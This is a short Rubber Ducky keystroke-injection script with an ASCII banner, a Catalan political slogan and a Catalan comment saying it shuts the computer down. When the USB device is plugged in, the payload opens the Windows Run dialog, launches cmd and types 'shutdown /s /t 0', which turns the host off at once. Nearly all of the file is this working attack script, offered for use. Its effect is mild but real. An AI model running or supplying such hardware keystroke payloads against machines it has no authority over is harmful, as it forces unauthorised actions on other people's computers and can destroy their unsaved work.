REM 00110100 01011000 01110011 01100001 01101101 01110000 01101100 01100101 
REM 
REM               ___ __   __                          _      
REM              /   |\ \ / /                         | |     
REM             / /| | \ V / ___  __ _ _ __ ___  _ __ | | ___ 
REM            / /_| | /   \/ __|/ _` | '_ ` _ \| '_ \| |/ _ \
REM            \___  |/ /^\ \__ \ (_| | | | | | | |_) | |  __/
REM                |_/\/   \/___/\__,_|_| |_| |_| .__/|_|\___|
REM                                             | |           
REM                                             |_|           
REM
REM              Visca la terra lliure i mori el mal govern
REM 
REM 00110100 01011000 01110011 01100001 01101101 01110000 01101100 01100101

REM Aquest script apagarà l'ordinador amb un Rubber Ducky

DELAY 1000
GUI r
DELAY 500
STRING cmd
DELAY 500
ENTER
DELAY 500
STRING shutdown /s /t 0
DELAY 500
ENTER
